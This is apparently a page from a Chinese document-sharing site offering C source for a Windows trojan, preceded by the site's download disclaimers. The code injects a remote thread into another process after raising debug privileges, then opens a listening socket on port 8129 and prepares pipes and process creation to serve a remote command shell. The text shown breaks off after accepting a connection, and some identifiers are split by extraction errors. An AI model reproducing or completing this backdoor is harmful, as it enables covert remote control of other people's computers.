C语言编写的木马程序(源代码附上)
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
#include
#pragma comment(lib,"ws2_32.lib")
#include
#include
#pragma comment(lib,"Shlwapi.lib")
#include
#include
#include
//参数结构;
typedef struct _RemotePara
{
DWORD dwLoadLibrary;
DWORD dwFreeLibrary;
DWORD dwGetProcAddress;
DWORD dwGetModuleHandle;
DWORD dwWSAStartup;
DWORD dwSocket;
DWORD dwhtons;
DWORD dwbind;
DWORD dwlisten;
DWORD dwaccept;
DWORD dwsend;
DWORD dwrecv;
DWORD dwclosesocket;
DWORD dwCreateProcessA;
DWORD dwPeekNamedPipe;
DWORD dwWriteFile;
DWORD dwReadFile;
DWORD dwCloseHandle;
DWORD dwCreatePipe;
DWORD dwTerminateProcess;
DWORD dwMessageBox;
char strMessageBox[12];
char winsockDll[16];
char cmd[10];
char Buff[4096];
char telnetmsg[60];
}RemotePara;
// 提升应用级调试权限
BOOL EnablePrivilege(HANDLE hToken,LPCTSTR szPrivName,BOOL fEnable);
// 根据进程名称得到进程ID
DWORD GetPidByName(char *szName);
// 远程线程执行体
DWORD __stdcall ThreadProc(RemotePara *Para)
{
WSADATA WSAData;
WORD nVersion;
SOCKET listenSocket;
SOCKET clientSocket;
struct sockaddr_in server_addr;
struct sockaddr_in client_addr;
int iAddrSize = sizeof(client_addr);
SECURITY_ATTRIBUTES sa;
HANDLE hReadPipe1;
HANDLE hWritePipe1;
HANDLE hReadPipe2;
HANDLE hWritePipe2;
STARTUPINFO si;
PROCESS_INFORMA TION ProcessInformation;
unsigned long lBytesRead = 0;
typedef HINSTANCE (__stdcall *PLoadLibrary)(char*);
typedef FARPROC (__stdcall *PGetProcAddress)(HMODULE, LPCSTR); typedef HINSTANCE (__stdcall *PFreeLibrary)( HINSTANCE ); typedef HINSTANCE (__stdcall *PGetModuleHandle)(HMODULE);
FARPROC PMessageBoxA;
FARPROC PWSAStartup;
FARPROC PSocket;
FARPROC Phtons;
FARPROC Pbind;
FARPROC Plisten;
FARPROC Paccept;
FARPROC Psend;
FARPROC Precv;
FARPROC Pclosesocket;
FARPROC PCreateProcessA;
FARPROC PPeekNamedPipe;
FARPROC PWriteFile;
FARPROC PReadFile;
FARPROC PCloseHandle;
FARPROC PCreatePipe;
FARPROC PTerminateProcess;
PLoadLibrary LoadLibraryFunc = (PLoadLibrary)Para->dwLoadLibrary; PGetProcAddress GetProcAddressFunc = (PGetProcAddress)Para->dwGetProcAddress; PFreeLibrary FreeLibraryFunc = (PFreeLibrary)Para->dwFreeLibrary;
PGetModuleHandle GetModuleHandleFunc = (PGetModuleHandle)Para->dwGetModuleHandle; LoadLibraryFunc(Para->winsockDll);
PWSAStartup = (FARPROC)Para->dwWSAStartup;
PSocket = (FARPROC)Para->dwSocket;
Phtons = (FARPROC)Para->dwhtons;
Pbind = (FARPROC)Para->dwbind;
Plisten = (FARPROC)Para->dwlisten;
Paccept = (FARPROC)Para->dwaccept;
Psend = (FARPROC)Para->dwsend;
Precv = (FARPROC)Para->dwrecv;
Pclosesocket = (FARPROC)Para->dwclosesocket;
PCreateProcessA = (FARPROC)Para->dwCreateProcessA;
PPeekNamedPipe = (FARPROC)Para->dwPeekNamedPipe;
PWriteFile = (FARPROC)Para->dwWriteFile;
PReadFile = (FARPROC)Para->dwReadFile;
PCloseHandle = (FARPROC)Para->dwCloseHandle;
PCreatePipe = (FARPROC)Para->dwCreatePipe;
PTerminateProcess = (FARPROC)Para->dwTerminateProcess;
PMessageBoxA = (FARPROC)Para->dwMessageBox;
nVersion = MAKEWORD(2,1);
PWSAStartup(nVersion, (LPWSADATA)&WSAData);
listenSocket = PSocket(AF_INET, SOCK_STREAM, 0);
if(listenSocket == INV ALID_SOCKET)return 0;
server_addr.sin_family = AF_INET;
server_addr.sin_port = Phtons((unsigned short)(8129));
server_addr.sin_addr.s_addr = INADDR_ANY;
if(Pbind(listenSocket, (struct sockaddr *)&server_addr, sizeof(SOCKADDR_IN)) != 0)return 0; if(Plisten(listenSocket, 5))return 0;
clientSocket = Paccept(listenSocket, (struct sockaddr *)&client_addr, &iAddrSize);